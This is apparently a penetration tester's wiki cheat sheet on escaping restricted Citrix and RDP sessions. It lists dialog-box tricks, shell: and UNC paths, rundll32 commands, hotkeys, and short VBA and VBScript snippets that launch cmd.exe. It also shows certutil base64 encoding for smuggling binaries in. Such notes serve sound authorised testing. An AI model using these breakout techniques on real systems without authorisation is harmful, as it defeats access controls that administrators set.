Citrix Breakout Techniques - CraigDonkin/Infrastructure GitHub Wiki
- Save as / Open as
- Print features
- Right click and open any apps you have access to , see if any of the functionality opens up dialogue boxes to play with
- Crate New Files
- Create batch files
- Create shortcuts to "%WINDIR%\system32"
- Open new explorer windows
- Properties > Open File Location
- enter file paths
- //127.0.0.1/C$
- C:\
- right click > Properties > Target
file:///c:/windows/system32/
\127.0.0.1\c$\Windows\System32
- Windows + F1
- Search for command prompt and get help to load a command prompt
- Search for other things that could open an explorer, or a link to a website that loads IE
- View Source > Notepad
- Print > Print Dialog
- Dialog box
- search for string
- click custom
- add search path for C:
- expand C > Right click sub directory > Include in Library > Create new library
%ALLUSERSPROFILE%
%APPDATA%
%CommonProgramFiles%
%COMMONPROGRAMFILES(x86)%
%COMPUTERNAME%
%COMSPEC%
%HOMEDRIVE%
%HOMEPATH%
%LOCALAPPDATA%
%LOGONSERVER%
%PATH%
%PATHEXT%
%ProgramData%
%ProgramFiles%
%ProgramFiles(x86)%
%PROMPT%
%PSModulePath%
%Public%
%SYSTEMDRIVE%
%SYSTEMROOT%
%TEMP%
%TMP%
%USERDOMAIN%
%USERNAME%
%USERPROFILE%
%WINDIR%
shell:Administrative Tools
shell:DocumentsLibrary
shell:Librariesshell:UserProfiles
shell:Personal
shell:SearchHomeFolder
shell:System shell:NetworkPlacesFolder
shell:SendTo
shell:UserProfiles
shell:Common Administrative Tools
shell:MyComputerFolder
shell:InternetFolder
about:
data:
ftp:
mailto:
news:
res:
telnet:
view-source:
\\127.0.0.1\c$\Windows\system32
-
cmd.exe
-
command.com
-
powershell.exe
-
Windows + Run
-
File browser
-
drag + drop
-
Hyperlink/Shortcut
-
Task Manager > New Task > Run
-
Task Scheduler > New task to run cmd.exe
-
cmd.exe /C
-
cmd.exe /K
1st: R: 10, G: 0, B: 0
2nd: R: 13, G: 10, B: 13
3rd: R: 100, G: 109, B: 99
4th: R: 120, G: 101, B: 46
5th: R: 0, G: 0, B: 101
6th: R: 0, G: 0, B: 0
- Save as 24-bit bitmap
- Change extension to bat and run
- !dir
- C:\Users\User\AppData\Local\temp
- C:\temp
- Address Bar > file://
- Menus
- help
- search
- Right click > View Source > notepad
- Right click > save picture as > Explorer
- Set homepage to cmd.exe
- F12 > File > Menu > Customize internet explorer view source > cmd.exe
- Certificate > Import > IE
- Active X plugins
- Browser Exploit
- VBA Macro
Sub OpenCMD()
Shell βCMD /K C:\windows\system32\cmd.exeβ, vbNormalFocus
End Sub
-
ActiveX Controls
-
XP command shell
-
Dialog box and shortcut exploitation
InitialProgram=cmd.exe
- RDP + Citrix
Good way of getting tools on if you only have copy and paste text.
Use certutil to turn the file into base64, copy it then use certutil to turn it back
certutil -encode cmd.exe cmd.txt
certutil -decode cmd.txt cmd.exe
mmc.exe
mstsc.exe
regedit.exe
taskmgr.exe
control.exe
rundll32.exe
dxdiag.exe
msconfig.exe
eventvwr.exe
systeminfo.exe
msinfo32.exe
osk.exe
at.exe
taskschd.msc
wmic.exe
qwinsta.exe
tasklist.exe
*.exe
*
*.*
- Right click > Open
- File protocol handlers in address bar
- File shortcuts
- drag + drop execution
used to execute dll functions from the command line, including native API calls to management consoles
Add/Remove Programs: RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0Content Advisor
Control Panel: RunDll32.exe shell32.dll,Control_RunDLL
Device Manager: RunDll32.exe devmgr.dll DeviceManager_Execute
Folder Options β General: RunDll32.exe shell32.dll,Options_RunDLL 0
Folder Options β Search: RunDll32.exe shell32.dll,Options_RunDLL 2
Forgotten Password Wizard: RunDll32.exe keymgr.dll,PRShowSaveWizardExW
System Properties: Advanced: RunDll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4
Taskbar Properties: RunDll32.exe shell32.dll,Options_RunDLL 1
User Accounts: RunDll32.exe shell32.dll,Control_RunDLL nusrmgr.cpl
Windows Firewall: RunDll32.exe shell32.dll,Control_RunDLL firewall.cpl
Sticky keys - Shift X5
Mouse keys - Shift + Alt + Numlock
High contrast - Shift + Alt + printscn
Toggle Keys - Numlock X 5seconds
Filter keys - Right SHIFT X 12 seconds
WINDOWS+F1 β Windows Search
WINDOWS+D β Show Desktop
WINDOWS+E β Launch Windows Explorer
WINDOWS+R β Run
WINDOWS+U β Ease of Access Centre
WINDOWS+F β Search
SHIFT+F10 β Context Menu
CTRL+SHIFT+ESC β Task Manager
CTRL+ALT+DEL β Splash screen on newer Windows versions
F1 β Help
F3 β Search
F6 β Address Bar
F11 β Toggle full screen within Internet Explorer
CTRL+H β Internet Explorer History
CTRL+T β Internet Explorer β New Tab
CTRL+N β Internet Explorer β New Page
CTRL+O β Open File
CTRL+S β Save
CTRL+N β New
CTRL+ALT+END β Opens Windows Security dialog box
CTRL+ALT+BREAK β Switches between windowed and full-screen
ALT+INSERT β Cycles through windows
ALT+HOME β Displays start menu
ALT+DELETE β Displays control / context menu
CTRL+ALT+NUMBER PAD MINUS β Takes screenshot of active window onto RDP clipboard
CTRL+ALT+NUMBER PAD PLUS β Takes screenshot of entire RDP session onto RDP clipboard
SHIFT+F1 β Displays Windows Task List
SHIFT+F2 β Toggles title bar
SHIFT+F3 β Closes remote application / Citrix connection
CTRL+F1 β Displays Windows NT Security desktop
CTRL+F2 β Displays remote task list or Start Menu
CTRL+F3 β Displays task manager
ALT+F2 β Cycles through maximised and minimised windows
ALT+PLUS β Cycles through open windows
ALT+MINUS β Cycles through open windows (reverse)
set objApp = CreateObject(βWScript.Shellβ)
objApp.Run βCMD C:\β